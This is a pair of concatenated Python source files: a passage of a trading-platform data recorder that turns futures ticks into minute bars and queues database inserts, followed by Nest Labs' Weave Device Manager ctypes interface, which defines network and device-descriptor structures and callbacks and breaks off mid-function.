self.mainEngine = mainEngine
self.eventEngine = eventEngine
        # Current date
        self.today = todayDate()
        # Dominant-contract mapping: key is the specific contract code (e.g. IF1604),
        # value is the dominant contract code (e.g. IF0000)
        self.activeSymbolDict = {}
        # Tick object dictionary
        self.tickDict = {}
        # Bar (K-line) object dictionary
        self.barDict = {}
        # State for the dedicated database-insertion thread
        self.active = False                     # working flag
        self.queue = Queue()                    # task queue
        self.thread = Thread(target=self.run)   # worker thread
        # Load settings and subscribe to market data
        self.loadSetting()
#----------------------------------------------------------------------
def loadSetting(self):
"""载入设置"""
with open(self.settingFileName) as f:
drSetting = json.load(f)
        # If 'working' is set to False, do not start the data-recording function
working = drSetting['working']
if not working:
return
if 'tick' in drSetting:
l = drSetting['tick']
for setting in l:
symbol = setting[0]
vtSymbol = symbol
req = VtSubscribeReq()
req.symbol = setting[0]
                # For the LTS and IB gateways, subscribing requires the exchange code
if len(setting)>=3:
req.exchange = setting[2]
vtSymbol = '.'.join([symbol, req.exchange])
                # For the IB gateway, subscribing also requires currency and product class
if len(setting)>=5:
req.currency = setting[3]
req.productClass = setting[4]
self.mainEngine.subscribe(req, setting[1])
                drTick = DrTickData()      # this tick instance can cache partial data (currently unused)
self.tickDict[vtSymbol] = drTick
if 'bar' in drSetting:
l = drSetting['bar']
for setting in l:
symbol = setting[0]
vtSymbol = symbol
req = VtSubscribeReq()
req.symbol = symbol
if len(setting)>=3:
req.exchange = setting[2]
vtSymbol = '.'.join([symbol, req.exchange])
if len(setting)>=5:
req.currency = setting[3]
req.productClass = setting[4]
self.mainEngine.subscribe(req, setting[1])
bar = DrBarData()
self.barDict[vtSymbol] = bar
if 'active' in drSetting:
d = drSetting['active']
            # Note: for the IB and LTS gateways, vtSymbol here should carry the '.exchange' suffix
for activeSymbol, vtSymbol in d.items():
self.activeSymbolDict[vtSymbol] = activeSymbol
        # Start the database-insertion thread
        self.start()
        # Register event listeners
        self.registerEvent()
#----------------------------------------------------------------------
    def processTickEvent(self, event):
        """Process tick (market data push) events"""
tick = event.dict_['data']
vtSymbol = tick.vtSymbol
        # Convert to DrTickData format
drTick = DrTickData()
d = drTick.__dict__
for key in d.keys():
if key != 'datetime':
d[key] = tick.__getattribute__(key)
drTick.datetime = datetime.strptime(' '.join([tick.date, tick.time]), '%Y%m%d %H:%M:%S.%f')
        # Record tick data
if vtSymbol in self.tickDict:
self.insertData(TICK_DB_NAME, vtSymbol, drTick)
if vtSymbol in self.activeSymbolDict:
activeSymbol = self.activeSymbolDict[vtSymbol]
self.insertData(TICK_DB_NAME, activeSymbol, drTick)
        # Emit a log entry
        self.writeDrLog(u'Recorded tick data %s, time: %s, last: %s, bid: %s, ask: %s'
                        %(drTick.vtSymbol, drTick.time, drTick.lastPrice, drTick.bidPrice1, drTick.askPrice1))
        # Update minute-bar data
        if vtSymbol in self.barDict:
            bar = self.barDict[vtSymbol]
            # First tick ever, or the start of a new minute
if not bar.datetime or bar.datetime.minute != drTick.datetime.minute:
if bar.vtSymbol:
newBar = copy.copy(bar)
self.insertData(MINUTE_DB_NAME, vtSymbol, newBar)
if vtSymbol in self.activeSymbolDict:
activeSymbol = self.activeSymbolDict[vtSymbol]
self.insertData(MINUTE_DB_NAME, activeSymbol, newBar)
                    self.writeDrLog(u'Recorded minute bar %s, time: %s, O: %s, H: %s, L: %s, C: %s'
%(bar.vtSymbol, bar.time, bar.open, bar.high,
bar.low, bar.close))
bar.vtSymbol = drTick.vtSymbol
bar.symbol = drTick.symbol
bar.exchange = drTick.exchange
bar.open = drTick.lastPrice
bar.high = drTick.lastPrice
bar.low = drTick.lastPrice
bar.close = drTick.lastPrice
bar.date = drTick.date
bar.time = drTick.time
bar.datetime = drTick.datetime
bar.volume = drTick.volume
bar.openInterest = drTick.openInterest
            # Otherwise keep accumulating into the current bar
else:
bar.high = max(bar.high, drTick.lastPrice)
bar.low = min(bar.low, drTick.lastPrice)
bar.close = drTick.lastPrice
#----------------------------------------------------------------------
    def registerEvent(self):
        """Register event listeners"""
        self.eventEngine.register(EVENT_TICK, self.processTickEvent)
#----------------------------------------------------------------------
def insertData(self, dbName, collectionName, data):
"""插入数据到数据库(这里的data可以是CtaTickData或者CtaBarData)"""
self.queue.put((dbName, collectionName, data.__dict__))
#----------------------------------------------------------------------
def run(self):
"""运行插入线程"""
while self.active:
try:
dbName, collectionName, d = self.queue.get(block=True, timeout=1)
self.mainEngine.dbInsert(dbName, collectionName, d)
except Empty:
pass
#----------------------------------------------------------------------
def start(self):
"""启动"""
self.active = True
self.thread.start()
#----------------------------------------------------------------------
def stop(self):
"""退出"""
if self.active:
self.active = False
self.thread.join()
#----------------------------------------------------------------------
def writeDrLog(self, content):
"""快速发出日志事件"""
log = VtLogData()
log.logContent = content
event = Event(type_=EVENT_DATARECORDER_LOG)
event.dict_['data'] = log
self.eventEngine.put(event)
|
WeaveDeviceMgr.py
|
#
# Copyright (c) 2013-2017 Nest Labs, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# @file
# Python interface for Weave Device Manager
#
"""Weave Device Manager interface
"""
from __future__ import absolute_import
from __future__ import print_function
import functools
import sys
import os
import re
import copy
import binascii
import datetime
import time
import glob
import platform
from threading import Thread, Lock, Event
from ctypes import *
import six
from six.moves import range
__all__ = [ 'WeaveDeviceManager', 'NetworkInfo', 'DeviceManagerException', 'DeviceError', 'DeviceManagerError' ]
NetworkType_WiFi = 1
NetworkType_Thread = 2
WiFiMode_AdHoc = 1
WiFiMode_Managed = 2
WiFiRole_Station = 1
WiFiRole_AccessPoint = 2
WiFiSecurityType_None = 1
WiFiSecurityType_WEP = 2
WiFiSecurityType_WPAPersonal = 3
WiFiSecurityType_WPA2Personal = 4
WiFiSecurityType_WPA2MixedPersonal = 5
WiFiSecurityType_WPAEnterprise = 6
WiFiSecurityType_WPA2Enterprise = 7
WiFiSecurityType_WPA2MixedEnterprise = 8
ThreadPANId_NotSpecified = 0xFFFFFFFF
ThreadChannel_NotSpecified = 0xFF
RendezvousMode_EnableWiFiRendezvousNetwork = 0x0001
RendezvousMode_Enable802154RendezvousNetwork = 0x0002
RendezvousMode_EnableFabricRendezvousAddress = 0x0004
TargetFabricId_AnyFabric = 0xFFFFFFFFFFFFFFFF
TargetFabricId_NotInFabric = 0
TargetDeviceMode_Any = 0x00000000 # Locate all devices regardless of mode.
TargetDeviceMode_UserSelectedMode = 0x00000001      # Locate all devices in 'user-selected' mode -- i.e. where the device
                                                    # has been directly identified by a user, e.g. by pressing a button.
TargetVendorId_Any = 0xFFFF
TargetProductId_Any = 0xFFFF
TargetDeviceId_Any = 0xFFFFFFFFFFFFFFFF
DeviceFeature_HomeAlarmLinkCapable = 0x00000001 # Indicates a Nest Protect that supports connection to a home alarm panel
DeviceFeature_LinePowered = 0x00000002 # Indicates a device that requires line power
SystemTest_ProductList = { 'thermostat' : 0x235A000A,
'topaz' : 0x235A0003}
DeviceDescriptorFlag_IsRendezvousWiFiESSIDSuffix = 0x01
def _VoidPtrToByteArray(ptr, len):
if ptr:
v = bytearray(len)
memmove((c_byte * len).from_buffer(v), ptr, len)
return v
else:
return None
def _ByteArrayToVoidPtr(array):
if array != None:
        if not (isinstance(array, str) or isinstance(array, bytearray)):
            raise TypeError("Array must be a str or a bytearray")
        return cast((c_byte * len(array)).from_buffer_copy(array), c_void_p)
else:
return c_void_p(0)
def _CStringToString(s):
return None if s is None else s.decode()
def _StringToCString(s):
return None if s is None else s.encode()
def _IsByteArrayAllZeros(array):
for i in range(len(array)):
if (array[i] != 0):
return False
return True
def _ByteArrayToHex(array):
return binascii.hexlify(bytes(array)).decode()
WeaveDeviceMgrDLLBaseName = '_WeaveDeviceMgr.so'
def _AllDirsToRoot(dir):
dir = os.path.abspath(dir)
while True:
yield dir
parent = os.path.dirname(dir)
if parent == '' or parent == dir:
break
dir = parent
def _LocateWeaveDLL():
scriptDir = os.path.dirname(os.path.abspath(__file__))
# When properly installed in the weave package, the Weave Device Manager DLL will
    # be located in the package root directory, alongside the package's
# modules.
dmDLLPath = os.path.join(scriptDir, WeaveDeviceMgrDLLBaseName)
if os.path.exists(dmDLLPath):
return dmDLLPath
# For the convenience of developers, search the list of parent paths relative to the
# running script looking for an OpenWeave build directory containing the Weave Device
# Manager DLL. This makes it possible to import and use the WeaveDeviceMgr module
# directly from a built copy of the OpenWeave source tree.
buildMachineGlob = '%s-*-%s*' % (platform.machine(), platform.system().lower())
relDMDLLPathGlob = os.path.join('build', buildMachineGlob, 'src/device-manager/python/.libs', WeaveDeviceMgrDLLBaseName)
for dir in _AllDirsToRoot(scriptDir):
dmDLLPathGlob = os.path.join(dir, relDMDLLPathGlob)
for dmDLLPath in glob.glob(dmDLLPathGlob):
if os.path.exists(dmDLLPath):
return dmDLLPath
raise Exception("Unable to locate Weave Device Manager DLL (%s); expected location: %s" % (WeaveDeviceMgrDLLBaseName, scriptDir))
class NetworkInfo:
def __init__(self, networkType=None, networkId=None, wifiSSID=None, wifiMode=None, wifiRole=None,
wifiSecurityType=None, wifiKey=None,
threadNetworkName=None, threadExtendedPANId=None, threadNetworkKey=None, threadPSKc=None,
wirelessSignalStrength=None, threadPANId=None, threadChannel=None):
self.NetworkType = networkType
self.NetworkId = networkId
self.WiFiSSID = wifiSSID
self.WiFiMode = wifiMode
self.WiFiRole = wifiRole
self.WiFiSecurityType = wifiSecurityType
self.WiFiKey = wifiKey
self.ThreadNetworkName = threadNetworkName
self.ThreadExtendedPANId = threadExtendedPANId
self.ThreadNetworkKey = threadNetworkKey
self.ThreadPSKc = threadPSKc
self.ThreadPANId = threadPANId
self.ThreadChannel = threadChannel
self.WirelessSignalStrength = wirelessSignalStrength
def Print(self, prefix=""):
print("%sNetwork Type: %s" % (prefix, NetworkTypeToString(self.NetworkType)))
if self.NetworkId != None:
print("%sNetwork Id: %d" % (prefix, self.NetworkId))
if self.WiFiSSID != None:
print("%sWiFi SSID: \"%s\"" % (prefix, self.WiFiSSID))
if self.WiFiMode != None:
print("%sWiFi Mode: %s" % (prefix, WiFiModeToString(self.WiFiMode)))
if self.WiFiRole != None:
print("%sWiFi Role: %s" % (prefix, WiFiRoleToString(self.WiFiRole)))
if self.WiFiSecurityType != None:
print("%sWiFi Security Type: %s" % (prefix, WiFiSecurityTypeToString(self.WiFiSecurityType)))
if self.WiFiKey != None:
print("%sWiFi Key: %s" % (prefix, self.WiFiKey))
if self.ThreadNetworkName != None:
print("%sThread Network Name: \"%s\"" % (prefix, self.ThreadNetworkName))
if self.ThreadExtendedPANId != None:
print("%sThread Extended PAN Id: %s" % (prefix, _ByteArrayToHex(self.ThreadExtendedPANId)))
if self.ThreadNetworkKey != None:
print("%sThread Network Key: %s" % (prefix, _ByteArrayToHex(self.ThreadNetworkKey)))
if self.ThreadPSKc != None:
print("%sThread Network PSKc: %s" % (prefix, _ByteArrayToHex(self.ThreadPSKc)))
if self.ThreadPANId != None:
print("%sThread PAN Id: %04x" % (prefix, self.ThreadPANId))
if self.ThreadChannel != None:
print("%sThread Channel: %d" % (prefix, self.ThreadChannel))
if self.WirelessSignalStrength != None:
print("%sWireless Signal Strength: %s" % (prefix, self.WirelessSignalStrength))
def SetField(self, name, val):
        name = name.lower()
if (name == 'networktype' or name == 'network-type' or name == 'type'):
self.NetworkType = ParseNetworkType(val)
elif (name == 'networkid' or name == 'network-id' or name == 'id'):
self.NetworkId = int(val)
elif (name == 'wifissid' or name == 'wifi-ssid' or name == 'ssid'):
self.WiFiSSID = val
elif (name == 'wifimode' or name == 'wifi-mode'):
self.WiFiMode = ParseWiFiMode(val)
elif (name == 'wifirole' or name == 'wifi-role'):
self.WiFiRole = ParseWiFiRole(val)
elif (name == 'wifisecuritytype' or name == 'wifi-security-type' or name == 'securitytype' or name == 'security-type' or name == 'wifi-security' or name == 'security'):
self.WiFiSecurityType = ParseSecurityType(val)
elif (name == 'wifikey' or name == 'wifi-key' or name == 'key'):
self.WiFiKey = val
elif (name == 'threadnetworkname' or name == 'thread-network-name' or name == 'thread-name'):
self.ThreadNetworkName = val
elif (name == 'threadextendedpanid' or name == 'thread-extended-pan-id'):
self.ThreadExtendedPANId = val
elif (name == 'threadnetworkkey' or name == 'thread-network-key' or name == 'thread-key'):
self.ThreadNetworkKey = val
elif (name == 'threadpskc' or name == 'thread-pskc' or name == 'pskc'):
self.ThreadPSKc = val
elif (name == 'threadpanid' or name == 'thread-pan-id' or name == 'pan-id'):
self.ThreadPANId = val
elif (name == 'threadchannel' or name == 'thread-channel'):
self.ThreadChannel = val
elif (name == 'wirelesssignalstrength' or name == 'wireless-signal-strength'):
self.WirelessSignalStrength = val
else:
raise Exception("Invalid NetworkInfo field: " + str(name))
class DeviceDescriptor:
def __init__(self, deviceId=None, fabricId=None, vendorId=None, productId=None, productRevision=None,
manufacturingYear=None, manufacturingMonth=None, manufacturingDay=None,
primary802154MACAddress=None, primaryWiFiMACAddress=None,
serialNumber=None, softwareVersion=None, rendezvousWiFiESSID=None, pairingCode=None,
pairingCompatibilityVersionMajor=None, pairingCompatibilityVersionMinor=None,
deviceFeatures=None, flags=None):
self.DeviceId = deviceId
self.FabricId = fabricId
self.VendorId = vendorId
self.ProductId = productId
self.ProductRevision = productRevision
self.ManufacturingYear = manufacturingYear
self.ManufacturingMonth = manufacturingMonth
self.ManufacturingDay = manufacturingDay
self.Primary802154MACAddress = primary802154MACAddress
self.PrimaryWiFiMACAddress = primaryWiFiMACAddress
self.SerialNumber = serialNumber
self.SoftwareVersion = softwareVersion
self.RendezvousWiFiESSID = rendezvousWiFiESSID
self.PairingCode = pairingCode
self.PairingCompatibilityVersionMajor = pairingCompatibilityVersionMajor
self.PairingCompatibilityVersionMinor = pairingCompatibilityVersionMinor
self.DeviceFeatures = [ ]
if deviceFeatures != None:
featureVal = 1
while featureVal != 0x80000000:
if (deviceFeatures & featureVal) == featureVal:
self.DeviceFeatures.append(featureVal)
featureVal <<= 1
self.Flags = flags if flags != None else 0
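        # Worked example: deviceFeatures == 0x3 decodes to
        # [DeviceFeature_HomeAlarmLinkCapable, DeviceFeature_LinePowered].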
def Print(self, prefix=""):
if self.DeviceId != None:
print("%sDevice Id: %016X" % (prefix, self.DeviceId))
if self.FabricId != None:
print("%sFabrid Id: %016X" % (prefix, self.FabricId))
if self.VendorId != None:
print("%sVendor Id: %X" % (prefix, self.VendorId))
if self.ProductId != None:
print("%sProduct Id: %X" % (prefix, self.ProductId))
if self.ProductRevision != None:
print("%sProduct Revision: %X" % (prefix, self.ProductRevision))
if self.SerialNumber != None:
print("%sSerial Number: %s" % (prefix, self.SerialNumber))
if self.SoftwareVersion != None:
print("%sSoftware Version: %s" % (prefix, self.SoftwareVersion))
if self.ManufacturingYear != None and self.ManufacturingMonth != None:
if self.ManufacturingDay != None:
print("%sManufacturing Date: %04d/%02d/%02d" % (prefix, self.ManufacturingYear, self.ManufacturingMonth, self.ManufacturingDay))
else:
print("%sManufacturing Date: %04d/%02d" % (prefix, self.ManufacturingYear, self.ManufacturingMonth))
if self.Primary802154MACAddress != None:
print("%sPrimary 802.15.4 MAC Address: %s" % (prefix, _ByteArrayToHex(self.Primary802154MACAddress)))
if self.PrimaryWiFiMACAddress != None:
print("%sPrimary WiFi MAC Address: %s" % (prefix, _ByteArrayToHex(self.PrimaryWiFiMACAddress)))
if self.RendezvousWiFiESSID != None:
print("%sRendezvous WiFi ESSID%s: %s" % (prefix, " Suffix" if self.IsRendezvousWiFiESSIDSuffix else "", self.RendezvousWiFiESSID))
if self.PairingCode != None:
print("%sPairing Code: %s" % (prefix, self.PairingCode))
if self.PairingCompatibilityVersionMajor != None:
print("%sPairing Compatibility Major Id: %X" % (prefix, self.PairingCompatibilityVersionMajor))
if self.PairingCompatibilityVersionMinor != None:
print("%sPairing Compatibility Minor Id: %X" % (prefix, self.PairingCompatibilityVersionMinor))
if self.DeviceFeatures != None:
print("%sDevice Features: %s" % (prefix, " ".join([DeviceFeatureToString(val) for val in self.DeviceFeatures])))
@property
def IsRendezvousWiFiESSIDSuffix(self):
return (self.Flags & DeviceDescriptorFlag_IsRendezvousWiFiESSIDSuffix) != 0
class DeviceManagerException(Exception):
pass
class DeviceManagerError(DeviceManagerException):
def __init__(self, err, msg=None):
self.err = err
if msg != None:
self.msg = msg
else:
self.msg = "Device Manager Error %ld" % (err)
def __str__(self):
return self.msg
class DeviceError(DeviceManagerException):
def __init__(self, profileId, statusCode, systemErrorCode, msg=None):
self.profileId = profileId
self.statusCode = statusCode
self.systemErrorCode = systemErrorCode
        if (msg == None):
            if (systemErrorCode):
                msg = "[ %08X:%d ] (system err %d)" % (profileId, statusCode, systemErrorCode)
            else:
                msg = "[ %08X:%d ]" % (profileId, statusCode)
        self.message = msg
def __str__(self):
return "Device Error: " + self.message
class _DeviceStatusStruct(Structure):
_fields_ = [
("ProfileId", c_uint32),
("StatusCode", c_uint16),
("SysErrorCode", c_uint32)
]
class _IdentifyDeviceCriteriaStruct(Structure):
_fields_ = [
("TargetFabricId", c_uint64),
("TargetModes", c_uint32),
("TargetVendorId", c_uint16),
("TargetProductId", c_uint16),
("TargetDeviceId", c_uint64)
]
class _NetworkInfoStruct(Structure):
_fields_ = [
('NetworkType', c_int32), # The type of network.
('NetworkId', c_int64), # network id assigned to the network by the device, -1 if not specified.
('WiFiSSID', c_char_p), # The WiFi SSID.
('WiFiMode', c_int32), # The operating mode of the WiFi network.
('WiFiRole', c_int32), # The role played by the device on the WiFi network.
('WiFiSecurityType', c_int32), # The WiFi security type.
('WiFiKey', c_void_p), # The WiFi key, or NULL if not specified.
('WiFiKeyLen', c_uint32), # The length in bytes of the WiFi key.
('ThreadNetworkName', c_char_p), # The name of the Thread network.
('ThreadExtendedPANId', c_void_p), # The Thread extended PAN id (8 bytes).
('ThreadNetworkKey', c_void_p), # The Thread master network key.
('ThreadPSKc', c_void_p), # The Thread pre-shared key for commissioner
('ThreadPANId', c_uint32), # The 16-bit Thread PAN ID, or kThreadPANId_NotSpecified
('ThreadChannel', c_uint8), # The current channel on which the Thread network operates, or kThreadChannel_NotSpecified
('WirelessSignalStrength', c_int16),# The signal strength of the network, or INT16_MIN if not available/applicable.
('Hidden', c_bool) # Whether or not the network is hidden.
]
def toNetworkInfo(self):
return NetworkInfo(
networkType = self.NetworkType if self.NetworkType != -1 else None,
networkId = self.NetworkId if self.NetworkId != -1 else None,
wifiSSID = _CStringToString(self.WiFiSSID),
wifiMode = self.WiFiMode if self.WiFiMode != -1 else None,
wifiRole = self.WiFiRole if self.WiFiRole != -1 else None,
wifiSecurityType = self.WiFiSecurityType if self.WiFiSecurityType != -1 else None,
wifiKey = _VoidPtrToByteArray(self.WiFiKey, self.WiFiKeyLen),
threadNetworkName = _CStringToString(self.ThreadNetworkName),
threadExtendedPANId = _VoidPtrToByteArray(self.ThreadExtendedPANId, 8),
threadNetworkKey = _VoidPtrToByteArray(self.ThreadNetworkKey, 16),
threadPSKc = _VoidPtrToByteArray(self.ThreadPSKc, 16),
threadPANId = self.ThreadPANId if self.ThreadPANId != ThreadPANId_NotSpecified else None,
threadChannel = self.ThreadChannel if self.ThreadChannel != ThreadChannel_NotSpecified else None,
wirelessSignalStrength = self.WirelessSignalStrength if self.WirelessSignalStrength != -32768 else None
)
@classmethod
def fromNetworkInfo(cls, networkInfo):
networkInfoStruct = cls()
networkInfoStruct.NetworkType = networkInfo.NetworkType if networkInfo.NetworkType != None else -1
networkInfoStruct.NetworkId = networkInfo.NetworkId if networkInfo.NetworkId != None else -1
networkInfoStruct.WiFiSSID = _StringToCString(networkInfo.WiFiSSID)
networkInfoStruct.WiFiMode = networkInfo.WiFiMode if networkInfo.WiFiMode != None else -1
networkInfoStruct.WiFiRole = networkInfo.WiFiRole if networkInfo.WiFiRole != None else -1
networkInfoStruct.WiFiSecurityType = networkInfo.WiFiSecurityType if networkInfo.WiFiSecurityType != None else -1
networkInfoStruct.WiFiKey = _ByteArrayToVoidPtr(networkInfo.WiFiKey)
networkInfoStruct.WiFiKeyLen = len(networkInfo.WiFiKey) if (networkInfo.WiFiKey != None) else 0
networkInfoStruct.ThreadNetworkName = _StringToCString(networkInfo.ThreadNetworkName)
networkInfoStruct.ThreadExtendedPANId = _ByteArrayToVoidPtr(networkInfo.ThreadExtendedPANId)
networkInfoStruct.ThreadNetworkKey = _ByteArrayToVoidPtr(networkInfo.ThreadNetworkKey)
networkInfoStruct.ThreadPSKc = _ByteArrayToVoidPtr(networkInfo.ThreadPSKc)
networkInfoStruct.ThreadPANId = networkInfo.ThreadPANId if networkInfo.ThreadPANId != None else ThreadPANId_NotSpecified
networkInfoStruct.ThreadChannel = networkInfo.ThreadChannel if networkInfo.ThreadChannel != None else ThreadChannel_NotSpecified
networkInfoStruct.WirelessSignalStrength = networkInfo.WirelessSignalStrength if networkInfo.WirelessSignalStrength != None else -32768
return networkInfoStruct
class _DeviceDescriptorStruct(Structure):
_fields_ = [
('DeviceId', c_uint64), # Weave device id (0 = not present)
('FabricId', c_uint64), # Id of Weave fabric to which the device belongs (0 = not present)
('DeviceFeatures', c_uint32), # Bit field indicating support for specific device features.
('VendorId', c_uint16), # Device vendor id (0 = not present)
('ProductId', c_uint16), # Device product id (0 = not present)
('ProductRevision', c_uint16), # Device product revision (0 = not present)
('ManufacturingYear', c_uint16), # Year of device manufacture (valid range 2001 - 2099, 0 = not present)
('ManufacturingMonth', c_ubyte), # Month of device manufacture (1 = January, 0 = not present)
('ManufacturingDay', c_ubyte), # Day of device manufacture (0 = not present)
('Primary802154MACAddress', c_ubyte * 8), # MAC address for primary 802.15.4 interface (big-endian, all zeros = not present)
('PrimaryWiFiMACAddress', c_ubyte * 6), # MAC address for primary WiFi interface (big-endian, all zeros = not present)
('SerialNumber', c_char * 33), # Serial number of device (nul terminated, 0 length = not present)
('SoftwareVersion', c_char * 33), # Version of software running on the device (nul terminated, 0 length = not present)
('RendezvousWiFiESSID', c_char * 33), # ESSID for pairing WiFi network (nul terminated, 0 length = not present)
('PairingCode', c_char * 17), # Device pairing code (nul terminated, 0 length = not present)
('PairingCompatibilityVersionMajor', c_uint16), # Pairing software compatibility major version
('PairingCompatibilityVersionMinor', c_uint16), # Pairing software compatibility minor version
('Flags', c_ubyte), # Flags
]
def toDeviceDescriptor(self):
return DeviceDescriptor(
deviceId = self.DeviceId if self.DeviceId != 0 else None,
fabricId = self.FabricId if self.FabricId != 0 else None,
vendorId = self.VendorId if self.VendorId != 0 else None,
productId = self.ProductId if self.ProductId != 0 else None,
productRevision = self.ProductRevision if self.ProductRevision != 0 else None,
manufacturingYear = self.ManufacturingYear if self.ManufacturingYear != 0 else None,
manufacturingMonth = self.ManufacturingMonth if self.ManufacturingMonth != 0 else None,
manufacturingDay = self.ManufacturingDay if self.ManufacturingDay != 0 else None,
primary802154MACAddress = bytearray(self.Primary802154MACAddress) if not _IsByteArrayAllZeros(self.Primary802154MACAddress) else None,
primaryWiFiMACAddress = bytearray(self.PrimaryWiFiMACAddress) if not _IsByteArrayAllZeros(self.PrimaryWiFiMACAddress) else None,
serialNumber = _CStringToString(self.SerialNumber) if len(self.SerialNumber) != 0 else None,
softwareVersion = _CStringToString(self.SoftwareVersion) if len(self.SoftwareVersion) != 0 else None,
rendezvousWiFiESSID = _CStringToString(self.RendezvousWiFiESSID) if len(self.RendezvousWiFiESSID) != 0 else None,
pairingCode = _CStringToString(self.PairingCode) if len(self.PairingCode) != 0 else None,
pairingCompatibilityVersionMajor = self.PairingCompatibilityVersionMajor,
pairingCompatibilityVersionMinor = self.PairingCompatibilityVersionMinor,
deviceFeatures = self.DeviceFeatures,
flags = self.Flags)
_dmLib = None
_CompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p)
_IdentifyDeviceCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, POINTER(_DeviceDescriptorStruct))
_PairTokenCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p, c_uint32)
_UnpairTokenCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p)
_NetworkScanCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint16, POINTER(_NetworkInfoStruct))
_AddNetworkCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint32)
_GetNetworksCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint16, POINTER(_NetworkInfoStruct))
_GetCameraAuthDataCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_char_p, c_char_p)
_GetRendezvousModeCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint16)
_GetFabricConfigCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p, c_uint32)
_ErrorFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_ulong, POINTER(_DeviceStatusStruct))
_GetBleEventFunct = CFUNCTYPE(c_void_p)
_WriteBleCharacteristicFunct = CFUNCTYPE(c_bool, c_void_p, c_void_p, c_void_p, c_void_p, c_uint16)
_SubscribeBleCharacteristicFunct = CFUNCTYPE(c_bool, c_void_p, c_void_p, c_void_p, c_bool)
_CloseBleFunct = CFUNCTYPE(c_bool, c_void_p)
_DeviceEnumerationResponseFunct = CFUNCTYPE(None, c_void_p, POINTER(_DeviceDescriptorStruct), c_char_p)
# This is a fix for WEAV-429. Jay Logue recommends revisiting this at a later
# date to allow for truly multiple instances, so this is temporary.
def _singleton(cls):
instance = [None]
def wrapper(*args, **kwargs):
if instance[0] is None:
instance[0] = cls(*args, **kwargs)
return instance[0]
return wrapper
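# Because WeaveDeviceManager (below) is wrapped with @_singleton, repeated
# construction returns the same object -- a sketch of the observable behavior:
#
#   dm1 = WeaveDeviceManager()
#   dm2 = WeaveDeviceManager()
#   assert dm1 is dm2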
@_singleton
class WeaveDeviceManager(object):
def __init__(self, startNetworkThread=True):
self.devMgr = None
self.callbackRes = None
self.networkThread = None
        self.networkThreadRunnable = False
self.networkLock = Lock()
self.completeEvent = Event()
self._InitLib()
devMgr = c_void_p(None)
res = _dmLib.nl_Weave_DeviceManager_NewDeviceManager(pointer(devMgr))
if (res != 0):
raise self._ErrorToException(res)
self.devMgr = devMgr
def HandleComplete(devMgr, reqState):
self.callbackRes = True
self.completeEvent.set()
def HandleError(devMgr, reqState, err, devStatusPtr):
self.callbackRes = self._ErrorToException(err, devStatusPtr)
self.completeEvent.set()
def HandleDeviceEnumerationResponse(devMgr, deviceDescPtr, deviceAddrStr):
print(" Enumerated device IP: %s" % (_CStringToString(deviceAddrStr)))
deviceDescPtr.contents.toDeviceDescriptor().Print(" ")
self.cbHandleComplete = _CompleteFunct(HandleComplete)
self.cbHandleError = _ErrorFunct(HandleError)
self.cbHandleDeviceEnumerationResponse = _DeviceEnumerationResponseFunct(HandleDeviceEnumerationResponse)
        self.blockingCB = None # set by other modules (BLE) that require servicing by the network thread while this thread blocks.
self.cbHandleBleEvent = None # set by other modules (BLE) that provide event callback to Weave.
self.cbHandleBleWriteChar = None
self.cbHandleBleSubscribeChar = None
self.cbHandleBleClose = None
if (startNetworkThread):
self.StartNetworkThread()
def __del__(self):
if (self.devMgr != None):
_dmLib.nl_Weave_DeviceManager_DeleteDeviceManager(self.devMgr)
self.StopNetworkThread()
def DriveBleIO(self):
# perform asynchronous write to pipe in IO thread's select() to wake for BLE input
res = _dmLib.nl_Weave_DeviceManager_WakeForBleIO()
if (res != 0):
raise self._ErrorToException(res)
def SetBleEventCB(self, bleEventCB):
if (self.devMgr != None):
self.cbHandleBleEvent = _GetBleEventFunct(bleEventCB)
_dmLib.nl_Weave_DeviceManager_SetBleEventCB(self.cbHandleBleEvent)
def SetBleWriteCharCB(self, bleWriteCharCB):
if (self.devMgr != None):
self.cbHandleBleWriteChar = _WriteBleCharacteristicFunct(bleWriteCharCB)
_dmLib.nl_Weave_DeviceManager_SetBleWriteCharacteristic(self.cbHandleBleWriteChar)
def SetBleSubscribeCharCB(self, bleSubscribeCharCB):
if (self.devMgr != None):
self.cbHandleBleSubscribeChar = _SubscribeBleCharacteristicFunct(bleSubscribeCharCB)
_dmLib.nl_Weave_DeviceManager_SetBleSubscribeCharacteristic(self.cbHandleBleSubscribeChar)
def SetBleCloseCB(self, bleCloseCB):
if (self.devMgr != None):
self.cbHandleBleClose = _CloseBleFunct(bleCloseCB)
_dmLib.nl_Weave_DeviceManager_SetBleClose(self.cbHandleBleClose)
def StartNetworkThread(self):
if (self.networkThread != None):
return
def RunNetworkThread():
            while (self.networkThreadRunnable):
self.networkLock.acquire()
_dmLib.nl_Weave_DeviceManager_DriveIO(50)
self.networkLock.release()
time.sleep(0.005)
self.networkThread = Thread(target=RunNetworkThread, name="WeaveNetworkThread")
self.networkThread.daemon = True
        self.networkThreadRunnable = True
self.networkThread.start()
def StopNetworkThread(self):
if (self.networkThread != None):
            self.networkThreadRunnable = False
self.networkThread.join()
self.networkThread = None
def IsConnected(self):
return self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_IsConnected(self.devMgr)
)
def DeviceId(self):
return self._CallDevMgr(
lambda: _dmLib.nl_Weave_DeviceManager_DeviceId(self.devMgr)
)
def DeviceAddress(self):
return self._CallDevMgr(
lambda: _CStringToString(_dmLib.nl_Weave_DeviceManager_DeviceAddress(self.devMgr))
)
def SetRendezvousAddress(self, addr, intf = None):
if addr is not None and "\x00" in addr:
raise ValueError("Unexpected NUL character in addr");
res = self._CallDevMgr(
